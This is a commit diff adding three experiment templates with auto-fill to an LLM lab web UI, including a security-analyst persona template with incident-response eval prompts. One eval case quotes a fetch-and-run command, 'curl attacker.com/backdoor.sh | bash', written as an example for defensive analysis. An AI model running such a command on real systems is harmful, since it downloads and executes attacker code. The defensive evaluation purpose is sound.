Lab: add 3 experiment templates with auto-fill
Templates section below experiment list: BASIC — Better Summaries (3 eval cases) Optimize summarization quality. Tests across biology, history, and technical content. Shows the simplest Lab workflow. INTERMEDIATE — Code Explainer (4 eval cases) Find the best prompt+model to explain code to non-programmers. Tests loops, recursion, error handling, comprehensions. Shows how the ratchet evolves system prompts. ADVANCED — Security Analyst Persona (5 eval cases) Evolve a cybersecurity AI across threat classification, executive summaries, developer education, incident response, and forensics. Tests multi-audience adaptation and domain expertise. Click any template → auto-fills the create form with name, objective, metric, all eval cases, and selects all available models. User can modify before creating. Each template card shows: level badge (green/amber/red), name, eval case count, and a description explaining what the experiment does and why it matters. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
This commit is contained in:
parent
f34e05168b
commit
ca660cbd10
101
llm_team_ui.py
101
llm_team_ui.py
@ -3382,9 +3382,13 @@ LAB_HTML = r"""
|
||||
<!-- EXPERIMENTS TAB -->
|
||||
<div id="lt-experiments" class="tc active">
|
||||
<div class="card">
|
||||
<h3>Create Experiment <button class="btn btn-p" style="margin-left:auto" onclick="showCreate()">+ New</button></h3>
|
||||
<h3>Your Experiments <button class="btn btn-p" style="margin-left:auto" onclick="showCreate()">+ New</button></h3>
|
||||
<div id="exp-list"><div class="empty">Loading...</div></div>
|
||||
</div>
|
||||
<div class="card" id="templates-card">
|
||||
<h3>Templates <span style="font-size:9px;color:var(--text2);font-weight:400;text-transform:none;letter-spacing:0">click to auto-fill the create form</span></h3>
|
||||
<div style="display:grid;gap:8px" id="template-list"></div>
|
||||
</div>
|
||||
<div id="create-form" class="card" style="display:none;border-color:var(--green)">
|
||||
<h3>New Experiment</h3>
|
||||
<div class="row"><label>Name</label><input id="cr-name" placeholder="e.g. Prompt Optimization v1"></div>
|
||||
@ -3747,6 +3751,101 @@ function toast(msg, ok=true) {
|
||||
setTimeout(function(){ t.style.opacity='0'; t.style.transition='opacity 0.3s'; setTimeout(function(){t.remove()},300); }, 2500);
|
||||
}
|
||||
|
||||
// ─── EXPERIMENT TEMPLATES ───
|
||||
var LAB_TEMPLATES = [
|
||||
{
|
||||
level: 'basic',
|
||||
name: 'Better Summaries',
|
||||
desc: 'Optimize a model to write concise, accurate summaries. The ratchet engine tweaks the system prompt and temperature until summaries consistently hit the right length and capture key points.',
|
||||
objective: 'Generate concise, accurate summaries that capture all key points in 2-3 sentences',
|
||||
metric: 'quality',
|
||||
config: {system_prompt: 'You are a summarization expert. Write clear, concise summaries.', temperature: 0.5},
|
||||
evals: [
|
||||
{input: 'Summarize: The mitochondria is the powerhouse of the cell. It produces ATP through cellular respiration, converting glucose and oxygen into energy. This process occurs in the inner membrane through the electron transport chain.', expected: 'A 2-3 sentence summary capturing mitochondria, ATP production, and cellular respiration.'},
|
||||
{input: 'Summarize: In 1969, Apollo 11 successfully landed humans on the Moon for the first time. Neil Armstrong and Buzz Aldrin spent about two hours on the lunar surface while Michael Collins orbited above. The mission fulfilled President Kennedy\'s 1961 goal and was watched by 600 million people worldwide.', expected: 'A concise summary mentioning Apollo 11, the astronauts, and the significance.'},
|
||||
{input: 'Summarize: Machine learning models can be broadly categorized into supervised learning, unsupervised learning, and reinforcement learning. Supervised learning uses labeled data, unsupervised finds patterns in unlabeled data, and reinforcement learning optimizes through reward signals.', expected: 'Brief overview of the three ML categories with key distinctions.'}
|
||||
]
|
||||
},
|
||||
{
|
||||
level: 'intermediate',
|
||||
name: 'Code Explainer',
|
||||
desc: 'Find the best system prompt and model to explain code to non-programmers. Tests whether the AI can break down technical concepts without using jargon, while remaining accurate.',
|
||||
objective: 'Explain code snippets to non-programmers: accurate, jargon-free, uses analogies, under 100 words',
|
||||
metric: 'quality',
|
||||
config: {system_prompt: 'Explain code to someone who has never programmed. Use everyday analogies. Be accurate but avoid jargon. Keep it under 100 words.', temperature: 0.7},
|
||||
evals: [
|
||||
{input: 'Explain this code:\nfor i in range(10):\n print(i)', expected: 'Clear explanation of a counting loop using a non-technical analogy.'},
|
||||
{input: 'Explain this code:\ndef fibonacci(n):\n if n <= 1: return n\n return fibonacci(n-1) + fibonacci(n-2)', expected: 'Explanation of recursion and the Fibonacci pattern without using the word recursion.'},
|
||||
{input: 'Explain this code:\ntry:\n result = 10 / x\nexcept ZeroDivisionError:\n result = 0', expected: 'Explanation of error handling using a real-world safety net analogy.'},
|
||||
{input: 'Explain this code:\nusers = {u.name: u for u in database.query(User).filter(active=True)}', expected: 'Explanation of dictionary comprehension and database filtering in plain language.'}
|
||||
]
|
||||
},
|
||||
{
|
||||
level: 'advanced',
|
||||
name: 'Security Analyst Persona',
|
||||
desc: 'Evolve the perfect system prompt for a cybersecurity AI analyst. Tests across threat classification, incident response, vulnerability assessment, and executive communication — all requiring different tones and depths.',
|
||||
objective: 'Create an AI security analyst that accurately classifies threats, explains vulnerabilities to both technical and executive audiences, and provides actionable remediation steps',
|
||||
metric: 'quality',
|
||||
config: {system_prompt: 'You are a senior cybersecurity analyst with 15 years of experience. Provide thorough, accurate security assessments. Adapt your language to the audience. Always include specific, actionable recommendations.', temperature: 0.3},
|
||||
evals: [
|
||||
{input: 'Classify this log entry: EXPLOIT_SCAN ip=45.33.32.0 path=/.env.production ua=python-requests/2.28', expected: 'Identify as automated scanner targeting environment files, recommend ban, explain risk.'},
|
||||
{input: 'Write an executive summary of this vulnerability: Our API endpoint /api/users accepts SQL injection via the search parameter. No parameterized queries are used.', expected: 'Non-technical summary for C-suite explaining business risk and remediation priority.'},
|
||||
{input: 'A developer asks: why is storing JWT tokens in localStorage bad?', expected: 'Technical explanation covering XSS risk, comparison to httpOnly cookies, and practical recommendation.'},
|
||||
{input: 'Our nginx logs show 500 requests per second from 200 different IPs all hitting /api/login. What is this and what do we do?', expected: 'Identify as distributed brute force, provide immediate response steps and long-term mitigations.'},
|
||||
{input: 'We found this in our Docker container: curl attacker.com/backdoor.sh | bash. The container had access to the production database.', expected: 'Incident response: containment, forensics, scope assessment, notification, and remediation plan.'}
|
||||
]
|
||||
}
|
||||
];
|
||||
|
||||
function renderTemplates() {
|
||||
var el = document.getElementById('template-list');
|
||||
if (!el) return;
|
||||
el.textContent = '';
|
||||
var levelColors = {basic:'var(--green)',intermediate:'var(--accent)',advanced:'var(--red)'};
|
||||
LAB_TEMPLATES.forEach(function(t, i) {
|
||||
var card = document.createElement('div');
|
||||
card.style.cssText = 'background:rgba(0,0,0,0.25);border:2px solid var(--border);border-radius:2px;padding:14px;cursor:pointer;transition:border-color 0.15s';
|
||||
card.onmouseenter = function(){card.style.borderColor='var(--accent)'};
|
||||
card.onmouseleave = function(){card.style.borderColor='var(--border)'};
|
||||
card.onclick = function(){loadTemplate(i)};
|
||||
var header = document.createElement('div');
|
||||
header.style.cssText = 'display:flex;align-items:center;gap:8px;margin-bottom:6px';
|
||||
var level = document.createElement('span');
|
||||
level.style.cssText = 'font-family:JetBrains Mono,monospace;font-size:8px;text-transform:uppercase;letter-spacing:1px;padding:2px 8px;border:1px solid;border-radius:1px;font-weight:700;color:'+levelColors[t.level]+';border-color:'+levelColors[t.level];
|
||||
level.textContent = t.level;
|
||||
var name = document.createElement('span');
|
||||
name.style.cssText = 'font-weight:700;font-size:13px';
|
||||
name.textContent = t.name;
|
||||
var evCount = document.createElement('span');
|
||||
evCount.style.cssText = 'margin-left:auto;font-family:JetBrains Mono,monospace;font-size:9px;color:var(--text2)';
|
||||
evCount.textContent = t.evals.length + ' eval cases';
|
||||
header.appendChild(level); header.appendChild(name); header.appendChild(evCount);
|
||||
card.appendChild(header);
|
||||
var desc = document.createElement('div');
|
||||
desc.style.cssText = 'font-size:12px;color:var(--text2);line-height:1.5';
|
||||
desc.textContent = t.desc;
|
||||
card.appendChild(desc);
|
||||
el.appendChild(card);
|
||||
});
|
||||
}
|
||||
|
||||
function loadTemplate(idx) {
|
||||
var t = LAB_TEMPLATES[idx];
|
||||
showCreate();
|
||||
document.getElementById('cr-name').value = t.name;
|
||||
document.getElementById('cr-obj').value = t.objective;
|
||||
document.getElementById('cr-metric').value = t.metric;
|
||||
selectedModels.clear();
|
||||
allModels.forEach(function(m){selectedModels.add(m.name)});
|
||||
renderModelChips();
|
||||
evalRows = t.evals.map(function(e){return {input:e.input, expected:e.expected}});
|
||||
renderEvalRows();
|
||||
toast('Template loaded: ' + t.name);
|
||||
document.getElementById('create-form').scrollIntoView({behavior:'smooth'});
|
||||
}
|
||||
|
||||
renderTemplates();
|
||||
|
||||
// Background grid
|
||||
!function(){var c=document.getElementById('bg-grid');if(!c)return;var x=c.getContext('2d');function resize(){c.width=window.innerWidth;c.height=window.innerHeight}resize();window.addEventListener('resize',resize);var t=0;function draw(){x.clearRect(0,0,c.width,c.height);var s=50,ox=(t*0.2)%s,oy=(t*0.1)%s;x.fillStyle='rgba(226,181,90,0.025)';for(var gx=-s+ox;gx<c.width+s;gx+=s)for(var gy=-s+oy;gy<c.height+s;gy+=s){x.beginPath();x.arc(gx,gy,0.7,0,Math.PI*2);x.fill()}t++;requestAnimationFrame(draw)}draw()}();
|
||||
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user